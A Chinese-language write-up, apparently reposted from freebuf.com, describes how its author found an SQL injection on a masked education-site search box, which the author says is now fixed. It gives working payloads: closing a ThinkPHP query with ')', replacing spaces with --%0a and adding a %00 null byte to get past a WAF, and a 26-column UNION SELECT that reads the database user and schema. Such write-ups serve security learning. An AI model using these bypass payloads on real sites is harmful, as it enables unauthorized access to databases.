漏洞已修复 只是分享一下自己挖掘过程的思路来提供大家学习
打开网站,www.xxedu.cn 发现最上面有个输入框
判断注入
输入一个单元号
页面报错
两个则正常
判断列数
首先闭合,这里程序使用的是thinkphp,查询时候会用小括号包裹,所以首先用’)闭合
1 keywords=1′) %23
order by x被拦截,用–%0a代替空格即可
27报错代表只有26行
联合注入
直接上union select会一直卡着没有任何返回
把空格都改为–%0a,成功响应
在select跟1,2,3…之间用两个–%0a负责会无响应
1 =1′)‐‐%0aunion‐‐%0aselect‐‐%0a‐‐%0a1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1
6,17,18,19,20,21,22,23,24,25,26
但是发现还是响应错误,这里就猜测是错误跟拦截响应都相同
联合注入Bypass
在1后面加上%00并url编码,原理是waf把空字节认为是结束导致了后面的语句可以绕过
1 1%00′)‐‐%0aunion‐‐%0aselect‐‐%0a‐‐%0a1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26
2 %23
得到回显点为4
使用user–%0a()得到用户cse
SCHEMA–%0a()得到数据库cse
来源:freebuf.com 2020-09-23 11:22:29 by: a1412666499
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册